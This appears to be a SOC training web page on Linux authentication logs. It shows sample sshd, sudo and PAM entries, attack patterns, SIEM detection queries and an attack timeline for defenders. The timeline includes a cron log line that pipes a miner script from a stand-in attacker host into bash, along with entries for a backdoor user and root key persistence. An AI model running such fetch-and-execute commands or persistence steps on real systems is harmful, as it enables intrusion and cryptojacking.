Home > SOC Analysis

Authentication Logs

Authentication logs are one of the most valuable log sources on Linux systems. They record SSH login attempts, sudo usage, su switching, PAM authentication processes, and user session activity. For SOC analysts, Linux authentication logs are the first place to detect brute force, password spraying, privilege escalation, account misuse, lateral movement, and insider attacks.

This chapter provides a full-scale, ultra-practical, SOC-grade breakdown of Linux authentication logs with real raw samples, SIEM queries, field interpretation, and attack timelines.

Where Authentication Logs Are Stored

Location varies by distro:

Debian/Ubuntu:

/var/log/auth.log

RHEL/CentOS/Amazon Linux:

/var/log/secure

These files contain nearly all authentication-related events:

  • SSH logins

  • sudo usage

  • su attempts

  • PAM events

  • key-based authentication

  • failed login reasons

  • remote access attempts

Core Authentication Events (Real Linux Log Samples)

Below are real raw logs exactly how SOC analysts see them.

1. SSH Failed Login (Brute Force Indicator)

Jan 10 01:44:12 ubuntu sshd[1441]: Failed password for root from 185.33.21.88 port 51222 ssh2

Interpretation:

  • “Failed password” = brute force attempt

  • Target user = root

  • Source IP = attacker

  • Port = ephemeral, but useful for correlation

2. Successful SSH Login

Jan 10 01:45:03 ubuntu sshd[1477]: Accepted password for mayur from 185.33.21.88 port 51234 ssh2

Interpretation:

  • If preceded by brute force → compromise

  • If from unusual country/IP → credential theft

3. Key-Based Login

Jan 10 02:11:42 ubuntu sshd[1521]: Accepted publickey for devops from 10.0.0.15 port 51111 ssh2

Interpretation:

  • Key authentication → high-privileged automation or attacker using stolen private key

4. Sudo Command Execution (Privilege Escalation)

Jan 10 01:46:12 ubuntu sudo: mayur : TTY=pts/0 ; COMMAND=/bin/bash

Interpretation:

  • User escalated to root

  • SOC must verify legitimacy

  • Often used to install malware, modify configs, dump secrets

5. su Command (Switch User)

Jan 10 03:01:10 ubuntu su: pam_unix(su:session): session opened for user root by mayur(uid=1001)

Interpretation:

  • User “mayur” switched to root

  • Equivalent to privilege escalation

6. Account Lockout (Multiple Failures)

pam_tally2(sshd:auth): user root tally 10, deny 10

Interpretation:

  • Too many failed attempts

  • Password spraying or botnet brute force

7. Invalid User Login Attempts

Jan 10 01:50:33 ubuntu sshd[1499]: Invalid user admin from 185.22.11.44

Interpretation:

  • Attackers scanning for default accounts

8. SSH Session Close

Jan 10 02:00:22 ubuntu sshd[1477]: pam_unix(sshd:session): session closed for user mayur

Useful for reconstructing timelines.

9. TTY Shell Spawned

Jan 10 01:46:13 ubuntu sudo: pam_unix(sudo:session): session opened for user root

This marks the start of root-level activity.

Understanding PAM (Pluggable Authentication Modules)

Authentication logs contain entries from PAM, the Linux authentication framework.

Typical messages:

pam_unix(sshd:auth)
pam_unix(sudo:session)

PAM logs tell you:

  • Which authentication module was used

  • Whether authentication succeeded or failed

  • Whether session opened or closed

SOC analysts track PAM chains to detect privilege escalation.

Attack Behavior Visible in Authentication Logs

Below are real attack patterns SOC analysts detect.

1. SSH Brute Force

Repeated:

Failed password for root from <IP>

Followed by:

Accepted password for root

This chain = compromise.

2. Password Spraying

Logs show:

Failed password for admin  
Failed password for test  
Failed password for oracle  
Failed password for postgres

Different users, same password attempt → spraying.

3. Compromised User Account

Signs:

Accepted password for user from unusual IP
sudo: user executed root commands
bash: user downloaded suspicious file

Combine SSH + sudo + command logs.

4. Lateral Movement (SSH Pivoting)

Attacker comes from internal host:

Accepted password for root from 10.0.0.25

Local IP = internal compromise.

5. Privilege Escalation

Indicator:

sudo: mayur : COMMAND=/bin/bash

If user is non-admin → suspicious.

6. Persistence Through SSH Keys

Attacker injects public keys:

AuthorizedKeysCommand: added key for root

Immediate persistence mechanism.

7. New User Creation

If attackers gain root:

useradd[1552]: new user hacker created

Creates permanent access.

SIEM Detection Queries (Practical)

Detect SSH brute force

message:"Failed password" AND program:sshd AND source.ip:<same_ip>

Detect successful login after failures

(source.ip:"185.*" AND message:"Failed password")
THEN message:"Accepted password"

Detect privilege escalation

program:sudo AND message:COMMAND

Detect new user creation

message:"new user"

Detect login from country not normally used

geoip.country_name != "India" AND program:sshd AND message:"Accepted password"

Detect key-based authentication

message:"Accepted publickey"

Complete Attack Timeline Using Authentication Logs (Practical Case)

Step 1: Brute Force

Failed password for root from 185.99.22.11 port 51555
Failed password for root from 185.99.22.11 port 51557
...

Step 2: Successful Login

Accepted password for root from 185.99.22.11

Step 3: Privilege Escalation

sudo: root : COMMAND=/bin/bash

Step 4: Backdoor Installed

CRON: (root) CMD (/usr/bin/curl http://evil.com/miner.sh | bash)

Step 5: Persistence

useradd: new user "backupadmin"

Step 6: Covering Tracks

sshd: session closed for user root
logrotate: rotated /var/log/auth.log

Authentication logs expose every step from brute force to persistence.

Analyst Investigation Workflow for Authentication Logs

  1. Start with the suspicious IP

  2. Count failed login attempts

  3. Identify accepted logins

  4. Check for sudo or su escalations

  5. Correlate with process logs (/var/log/syslog, bash history)

  6. Check cron and user creation logs

  7. Check for persistence (SSH keys, cron, services)

  8. Build a timeline of attacker activity

  9. Mark session as compromise if malicious patterns found

  10. Escalate to IR team

This is actual SOC practice.

Intel Dump

  • Linux authentication logs live in /var/log/auth.log or /var/log/secure.

  • Critical entries include SSH failures, successful logins, sudo usage, su switching, PAM events.

  • Key attack indicators include brute force, spraying, privilege escalation, lateral movement, and persistence creation.

  • Real logs show raw SSH login events, sudo commands, new users, cron persistence, and shell activity.

  • SIEM queries detect brute force, compromised accounts, key-based logins, and privilege misuse.

  • Authentication logs often reveal the entire compromise timeline from login attempt to root-level activity.

HOME LEARN COMMUNITY DASHBOARD